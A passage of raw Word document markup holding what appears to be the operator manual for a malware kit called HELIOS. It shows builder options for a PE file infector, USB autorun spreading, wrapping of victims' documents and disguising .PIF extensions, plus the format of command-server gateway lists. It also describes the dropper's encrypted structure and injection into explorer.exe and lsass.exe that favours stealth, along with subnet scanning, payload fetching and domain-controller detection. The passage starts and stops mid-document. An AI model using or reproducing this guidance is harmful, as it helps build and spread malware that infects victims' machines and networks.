      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>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t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">The likeliness that a .PIF extension will be used instead </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of the regular .exe</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(0 means PIF will never be used, 100 means PIF will</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always be used)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Here is an example of the input requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004825E7" w:rsidRDefault="004825E7" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pP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builder.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>-u gateway_list.txt</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-d webdav_list.txt</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-a 666</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-w 777</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-o dropper.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRPr="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>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-1 1</w:t>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRPr="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>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-2 1</w:t>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(USB Ops enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRPr="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>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-3 1</w:t>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(Will install autorun.inf in the USB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRPr="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>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-4 0</w:t>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(Will not append the date in the wrapped USB File)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRPr="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>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-5 1</w:t>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(Enables RTO)</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-6 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>(Enables the Wrapper)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-7 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>(Enables the PE infector)</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 50</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>(PE infector infects every other file)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRP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-r 75</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>(3/4th of the Docs are wrapped)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRPr="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>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 30</w:t>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 xml:space="preserve">(Only documents accessed within the last 30 days are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noticed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>-p 50</w:t>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00536E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(Half/half chance that the .PIF extension will be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36E6B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>used)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F4309" w:rsidRDefault="002F4309" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F4309" w:rsidRDefault="002F4309" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>As noted before, the parameters must be in the correct order, as shown in the example and parameter list.</w:t>
      </w:r>
      <w:r w:rsidR="00F32926">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> Also note that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F32926">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F32926">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Gateway lists may be the same file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc347394080"/>
      <w:r>
        <w:t>Gateway URL List format</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>The gateway list contains the gateway URLs that HELIOS will attempt to contact before any attempt at propagation is made. The text file must be in ASCII characters, using standard Windows string delimiters. Just note that this component is very sensitive: if a malformed entry is found, a critical error could occur while HELIOS is in system memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Example Gateway URLs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.google.com:80/gateway/gate.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>http://10.0.0.1:8080/stealth.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A port must always be appended. The HTTP protocol prefix must also be included. Each domain must contain a sub-domain string. Do not include an extra carriage return on the last entry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00F32926">
        <w:t>ttp://webdav-server/folder/file.ex</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F32926" w:rsidRPr="00F32926" w:rsidRDefault="00F32926" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list does not require a port.</w:t>
      </w:r>
      <w:r w:rsidR="008F6068">
        <w:t xml:space="preserve"> A filename and extension must be specified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc347394081"/>
      <w:r>
        <w:t>High-level Binary Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>The builder will generate a PE with the following structure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRPr="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00926E90">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dropper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRPr="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00926E90">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CORE32/CORE64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Gateway list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>HELIOS resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00926E90" w:rsidRDefault="00926E90" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The other resources contain icons, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and other required </w:t>
      </w:r>
      <w:r w:rsidR="00536E6B">
        <w:t>files for HELIOS to operate. The gate lists are copied into both the 32-bit and 64-bit copies of the HELIOS Core DLLs. The configuration, and lists, are both encrypted using 32-bit XOR/shift.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00536E6B" w:rsidRDefault="00536E6B" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">All required configurations are first appended to the last segment of the CORE DLLs. Next, the CORE DLLs are appended to the last segments of the dropper. It is under user discretion if a PE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crypter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is required for the dropper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2602D" w:rsidRDefault="00F2602D" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F2602D" w:rsidRDefault="00F2602D" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc347394082"/>
      <w:r>
        <w:t>Process Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00F2602D" w:rsidRDefault="00F2602D" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F2602D" w:rsidRDefault="00F2602D" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The PE generated by the builder requires UAC administrative rights for maximum effectiveness. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> requires that administrator rights exist. The Wrapper does not require administrative rights, but injection may not be successful on systems later than Windows XP. The dropper will first unpack the CORE DLLs, selecting the correct DLL respective of CPU architecture. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2602D" w:rsidRDefault="00F2602D" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">When the dropper is executed, the CORE32 DLL will be executed in the process space of the dropper. From here, CORE32 will begin selecting processes to inject into. Two processes will be targeted: explorer.exe, lsass.exe. explorer.exe is required for the Wrapper subroutines, and lsass.exe is required for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> engine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2602D" w:rsidRDefault="00F2602D" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">When CORE32 is loaded, it will attempt to resolve its own IAT. Some functions, that do not exist on certain builds of Windows, will fail. However, HELIOS will check the validity of each function before attempt to execute code on it, preventing crashes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2602D" w:rsidRDefault="00F2602D" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Generally, the runtime CORE image will be copied into either 0x10000000 range, or 0x0000000010000000 (x64). If this range is unavailable, an attempt will be made to load into a random boundary. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2602D" w:rsidRDefault="00F2602D" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">On x86 systems, the standard functions used to inject are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WriteProcessMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CreateThreadEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. On x64 systems, certain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntdll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exports will be used instead. Since each API is different</w:t>
      </w:r>
      <w:r w:rsidR="001F6485">
        <w:t>, some of these functions may fail. HELIOS will prioritize the stealth functions, if available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>The CORE injector may be configured to inject into all active processes, but this is available in the source code configuration only.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>HELIOS will delegate tasks depending on where the CORE DLL has been loaded:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Resolve IAT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Initialize debug procedures (DEBUG MODE ONLY).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Start the process injector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a global Process ID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mutex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, preventing multiple injections into the same process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Extract the user configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scan_net</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() procedure, used to discover neighbors in the subnet range.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create the husk process global </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mutex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (FIXME)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fetch_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() subroutine, used to communicate with the gateways. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Determine if the CORE is running on a PDC (Primary Domain Controller)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F6485" w:rsidRDefault="001F6485" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
